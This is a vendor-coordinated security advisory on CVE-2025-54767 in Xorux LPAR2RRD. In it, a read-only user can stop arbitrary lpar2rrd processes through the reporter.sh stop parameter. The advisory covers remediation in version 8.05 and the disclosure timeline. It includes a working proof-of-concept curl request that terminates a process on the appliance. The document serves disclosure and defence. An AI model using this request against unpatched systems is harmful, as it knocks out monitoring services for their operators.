Skip to main content
Security Advisory

Xorux LPAR2RRD Read Only User Denial of Service

Advisory ID
KL-001-2025-014
CVE ID
CVE-2025-54767
Published
2025-07-28
Vendor
Xorux

Affected Systems

Product
LPAR2RRD
Version
8.04 and prior
Platform
Rocky Linux 8.10

Discovered By

Jim Becher (KoreLogic)
Download (signed .txt)
Back to Advisories

Vulnerability Details

Affected Vendor: Xorux
Affected Product: LPAR2RRD
Affected Version: 8.04 and prior
Platform: Rocky Linux 8.10
CWE Classification: CWE-648: Incorrect Use of Privileged APIs
CVE ID: CVE-2025-54767

Vulnerability Description

An authenticated, read-only user can kill any processes running on the Xormon Original virtual appliance as the lpar2rrd user.

Technical Description

The web application endpoint of https://<ip>/lpar2rrd-cgi/reporter.sh calls ../bin/reporter_cfg.pl, which contains a URL parameter command called stop which allows an attacker to specify a process ID (PID) to stop. The web application, running as the lpar2rrd user, then kills the process on the virtual appliance. This could be used to stop the webserver, the xormon.war web application or the lpar2rrd-daemon process, creating a denial of service (DoS) condition.

Mitigation and Remediation Recommendation

Xorux released version 8.05, which includes a remediation for this vulnerability. See https://lpar2rrd.com/note800.php.

Credit

This vulnerability was discovered by Jim Becher of KoreLogic, Inc.

Proof of Concept

On the Xormon Original virtual appliance:

    [lpar2rrd@xorux ~]$ ps -efww | grep lpar2rrd | grep bash
    lpar2rrd  185824  185823  0 May27 pts/0    00:00:00 -bash
    lpar2rrd 1777882  185824  0 13:40 pts/0    00:00:00 grep --color=auto bash
    [lpar2rrd@xorux ~]$

From attacker box:

    attacker $ curl -k -H "Authorization: Basic amJlY2hlcjpqYmVjaGVy" 'https://172.31.255.207/lpar2rrd-cgi/reporter.sh?cmd=stop&pid=185824'
    {"status":"terminated"}

On the Xormon Original virtual appliance:

    [lpar2rrd@xorux ~]$ Connection to 172.31.255.207 closed.
    attacker $

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Disclosure Timeline

KoreLogic requests point-of-contact to securely report several vulnerabilities to Xorux.

Vendor provides support@xorux.com as the point-of-contact, noting that they do not use PGP.

KoreLogic submits this vulnerability and four additional discoveries to Xorux.

Vendor acknowledges receipt, stating that the issue has been remediated and a new version of the affected product will be available 2025-07-25.

Xorux publishes updated version of the affected product.

KoreLogic public disclosure.

Back to Advisories

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable

Resources & Downloads

Contact Security Team
All Advisories Download signed .txt